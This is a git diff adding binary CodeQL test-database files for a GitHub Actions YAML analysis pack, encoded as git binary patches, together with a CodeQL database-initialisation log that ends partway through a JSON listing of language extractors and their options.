znPuZQola+SBQAns+|J_PD$HY=5NB~UEiPYv>ht2xxHjEi9O%Dkj(yif^oQ#yv7E1I z{AV>Ywjb7Wqwb%b#dRDP?)kPMTQrlh+I|YNY?}9nj}fZKX5pcc*40M;N2%+xX#b?N z&FVTZvRmtMJA|)?J{aVPaqNll8OJd{^kd>YtehR_Rrjjbxq8{TKlxUvt8j6Ed>$WM zgDU*7h&#yEd{~aJAJDCtHu<5syD#0c(rxO86?{8Fo(;pHwRpISdAY4|=JFql16i)1IXEJ>fUyhd-xHvOFfV%OXkBG->DA@@x?gWue;J@P!V^Nl{j_EN|6e zHp@f0TK)eimw~2Po=l7PVRckVE~;{tG?S1#Wl6E@Hk#9jf%m^vmPn-E(0)*FR0B0|)2F&$~T}KYrxDJ={Njx>duSYS10PeeEmGB7o$;p2Q91KtM6a`@Z+0q zr`zrJx-Yx0y5DzScYoOIaAh?P)i-_-AV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009F3 HW`Vx|E&&!+ literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml.rel b/ql/src/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..529b4a834dece968ff95f48071bca09a7a2963c7 GIT binary patch literal 7992 zcmYkA3Cvw(5r+SBz@S#PvI+9H_oskj*-F{5wWZ+JvI!I@7E&l;WeG?Tu?UC?DuNUd z0og)ukI{g;F$M@B7>ru*~XGme|TCHhL#e%sW1>u!y1k1EC$^X)Z52k~7tLdDG)q2c)g&-UFHokEonYTSHl z&#L~Y;W-ycW&Z4qPwGt`5U3)ljxqP zpEqCr&S4*PFI3*f72j(YbZ;FbaqBo6Kcno`@SKV7EEMy@bHwxhsP)ay`Z|LHP$hBe zPoW11BKz0+zQ<1JJTyGD@|=y%N0r2_<9rsN%DjfBGd{GSLwx6N?+3dw?As92=gl(OZKzJYB10sC`eW zar>T#o?QLJbMBT0Z~D3>rv}HSuls)mYW-!kuk}wrPeYZ&eXj%2m8khEYJKzF|7V~| z;^w>m&lE&fHhkRws|q^ghmU*YEY$kuXJ5Go&PJ8Qt$#3jt{`$&Q~!1N=NELSpY@#t zy8yMH^N0T4z3b zb#QFv=^U;JPQLRr-}7=E8lKjd=Mm^yR7pHMKQX`)*EKvBfPFGJw&nS$;0@1(U^fTH zwmd%_yy3YB?6%<8jZyiG&^u81%jbEl{Fk72qDtcCJDzIV?(sQf*r)|dZW^j=g++`gXE zuL~mgkRSe@({C1Z$WQ&Fz`h;4*0;{l=y!u-!~YnbzZabR@b^CXesFB&KgsibsQu*Q z{I^1vqW7b|mvP1SIv#yM2T5E$?&k*uk^8BW_wufNsGviB-phOV;oziaU5*2L47Km0 zHEv(;;U8B&@!Z2d3EuQQ0PJVMvFYnQ{5Wd;$7)~epMm}YRTB5Tyz`$#&40YsH{bRB zC8{Kz_5Jk#PdwT1aeaRq92-8)|M%55-#Iw{mFQEbeT^&jJq7)P4w880|MUP)Jk|7_ z5BBHa*z}#j^IwD4zSdcU{yjK$BUF5Zu0!QxefO1omZSefmBh`r@4p3+bq$}l;s2+g zLw@*pPM-4r8AC{{I>6A!JEE&leewO{AWK! 
zyC42`#T&;9Prj$R?SnUc`S(TV9z{w$`_}W-O$v(FzSgI9=N>{5FZH*;9|?-r`sTy2 zo5CX9$Ums>xh0RYu=MNlJKz1kHU7?6q{MwNe>(ndI#}O3`+;-a%@!1=uWM%Ceerk4 zB8ite%%Ec}OaAPJC+E7`tE7+PC7*k{n-jd|%ZHhDd`2ntvR=-aH5hR6vrl#e_ijQ; ze)u!v?jS(tuxI7(9QMKYx0ml_T=Bhj!9S#U<9Ol8nsoDmH#}#8zdkrNJV)RQ@vVPw z$`qCfqPcN6I*z)CY@&$Nxal?K8u4lJa+~6w+mA8!_#wm zRPf5v`OgPGCO9_pbPmS`C*S>GKEIc`rP%PazVA!V?gT87_?YKO!5f|n$U8YWw&l4z zc*Aoc`P?Z=so(Nk5xn8Kh`iH-W4&|aKLYo=O8!g9_xoD@tMK2BMG`Oh&gUJ$8~$M3 zJA-4xpL@7FJ9xvNwe8Lgjtzg-wmUC)!=JV7R)fpaeQUlvIYZrrSS0cBoG%LA@Z5vE zi-Tjs)BUg}c*E2C^L@dw;px47S@4FZ_vcmM^1O107oI2Lf4Jt?`1n5jXz+$7XS(}X zaBO&bFI|go{i`ZZ=fE0vAFuf}Ugp5>jc#qtzqZyl-+Sr$nqT83-+SqX;0+(|r5l4| z!)Frwror#lRzBV{E5UEZ%G0=F-&62!Dc(3<`a1txgExKMZ?^}>rtb{!JA>E0?&n3| zcLm30y++`7V``}RA*8=mgl`@!vd-w-c- z_rrgn=GS=XI}QB7;7#96!5<2aweRNWX5bHFt?%#o^*lTO?eKqqMG`Od{oa2>P`uVR zpYQ1Ihh}exm;5d9e*{Rs?va}BKHM7rQL}5@2j@H;|ED@w-z)3l`TDt_ICZj5_QikP z><#f!XM6l71jQSkbMc=n>En3G_k8^-c+HoO=j%7YvCd80IsYy=`OZz;@BOEOW5a(E z{Ezs~;fc!MIqZY~G*+I*73aAN{-26Bj+gqLufGIuc+Ld>TX1Z6j==wcZ~dn$PwVfD zzYdEeUg}Tb|0{T{KMQ{+@c)|3fAYi@p0jy;hG!)4@qC^Q-tgR&yyt>r!_#}_f59tH z=jnNOt&vhc^K=d`1}EPf^ZDNItr?y^`@Tnj`&lIM@a$g_yy3ZkyiJ1pA=LWt>|YkV z;kgi;J)xBP4bPslH{cD=MdW$@kdnVK57r;yb7th<_vGh$e+fQkLrJ{kGoPNbG~f;Y z!@)U|1J2*@=RWK?O9S5U=RWK?0|UMxIcT&e3>U_t%y8N1n2Hh z63>0u?;pJ3$@hMLU~oT#+Lu}O2V-5Yxs|8&PryF}izHt1snO2^G~eIh?qT!c*t3>O z;w7Io=@$SZef$6CxtIDwgBwKUa}bY*VXbfedY-L+K0bRwNxbC4y?i$v$f|!DepOm**PrbFoO` zmx1TK%(w5Q;Fn{O#K-S-MewFCwfheS_d}?2v+tF`>wAf_hW*tQ=ZuW=*~|Sk z`0{E09X%KS+L~YErTz}!*9C9*cz&-Bjt!rqc)THa!-uod-xwU5xg7(3Q*iR#pYr#f zxg|I@-!GHkx8l>UzlQwhdEN?rKmKi4-^;k-oG-_}U1vkQ)Mw56I}6O`>U+6P+!_5{ Q!LfNS=X`hY=Dm*lKmT;wC;$Ke literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..a3783e268b8d3866cb97455ff14cd484ab0b8d47 GIT binary patch literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..014f03a3a638a16c87b040ee21668cc0ff098479 GIT binary patch literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82 GIT binary patch literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..e045b05d47e291009889305846e60f9c1b64b7a1 GIT binary patch literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. 
+[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. 
+[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - 
info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to 